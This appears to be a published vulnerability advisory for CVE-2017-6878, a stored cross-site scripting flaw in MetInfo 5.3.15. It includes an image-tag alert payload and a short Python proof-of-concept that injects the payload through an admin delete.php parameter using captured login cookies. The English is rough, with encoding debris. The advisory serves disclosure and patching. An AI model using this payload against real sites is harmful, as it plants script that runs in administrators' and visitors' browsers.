MetInfo 5.3.15 Cross Site Scripting
Posted on 20 March 2017
PSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPS PSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPS [CVE-2017-6878]:MetInfo5.3.15 Stored Cross Site Scripting Application: MetInfo Versions Affected: 5.3.15 Vendor URL: http://www.metinfo.cn/ Software Link:http://www.metinfo.cn/upload/file/MetInfo5.3.zip Bugs: Stored XSS Author:Arice.chen(DBAPPSecurity Ltd) Description: MetInfo was established in March 2009, is a enterprise CMS, more than 40 m enterprises in the use of MeInfo build their own enterprise website. Vulnerability detailsPSo To modify, add a message in problem position insert JavaScript test code <img src=x onerror=alert(1)> Then the background access to relevant pages, or other users access to the front desk page will make the attack code is executed. --------------------------------------------- E-mailPSocallarice@163.com DBAppSecurity Ltd www.dbappsecurity.com.cn POC: import requests url = "http://192.168.0.28/MetInfo5.3/admin/column/delete.php?anyid=25&lang=cn&ajaxmetinfo=1&no_order_2=1&name_2=1<img src=x onerror=alert(2)>&nav_2=1&index_num_2=0&action=editor&lang=cn&anyid=25&allid=2," headers = { "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", } cookies = dict(PHPSESSID="9o2pth5a43hpj23nflnc7lfi24", recordurl="", met_auth="dfc7PoNLWryZ6Bu2hOEqxsEzRwMf3Nc%2BYqOWCxrSuQ2SivQF%2Fwfo0OP4JEP%2F7QakKJaXa46h5BB3nqrtt58caQaJcQ", met_key="pnZh0Fw", langset="cn", upgraderemind="1", tablepage_json="0%7Cuser%2Cadmin_user%2Cdojson_user_list" ) s = requests.get(url,cookies=cookies,headers=headers,timeout=10,verify=False) if s.status_code==200: print 'Success' Use this POC needs to obtain the cookie after login, because insert JavaScript place in the background. The problem find is delete.php?name_2= payload is :<img src=x onerror=alert(2)> If after the success of the insert JavaScript, to several places in the background and other users access to the front desk page to attack code execution